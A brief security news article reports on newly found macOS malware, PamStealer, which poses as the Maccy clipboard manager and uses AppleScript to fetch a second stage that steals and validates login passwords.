24.7 C
New York

New macOS Malware Uses Stealthy Techniques to Steal Credentials

Published:

Researchers Discover Novel macOS Malware with Custom Credential Stealing Code

Researchers have identified a previously unseen piece of macOS malware that employs sophisticated tradecraft to infect Macs with custom-developed credential-stealing code. The malware operates in two stages.

Delivery and Execution Chain

The malware is distributed in a disk image posing as Maccy, a clipboard manager for Macs. It’s written in AppleScript and uses native Objective-C APIs to download and execute the second stage payload.

Stealth Measures and Password Validation

The malware employs unusual techniques for stealth. When double-clicked, the AppleScript opens in the macOS Script Editor, where malicious functionality is hidden. The malware also validates the target’s login password before sending it to an attacker-controlled server.

Conclusion

PamStealer combines a recently emerging delivery surface with a less familiar payload, showcasing the evolution of commodity macOS stealers towards quieter execution chains and native implementations.

Related articles

Recent articles

spot_img